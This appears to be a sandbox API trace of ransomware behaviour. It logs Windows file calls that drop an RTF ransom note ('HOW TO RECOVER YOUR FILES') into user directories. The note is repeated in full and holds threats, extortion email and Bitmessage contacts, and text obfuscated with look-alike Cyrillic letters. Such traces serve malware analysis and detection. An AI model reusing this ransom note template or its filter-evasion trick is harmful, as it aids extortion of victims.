;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.589] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.592] CloseHandle (hObject=0x2f0) returned 1 [0286.592] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0286.592] GetLastError () returned 0x2 [0286.592] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 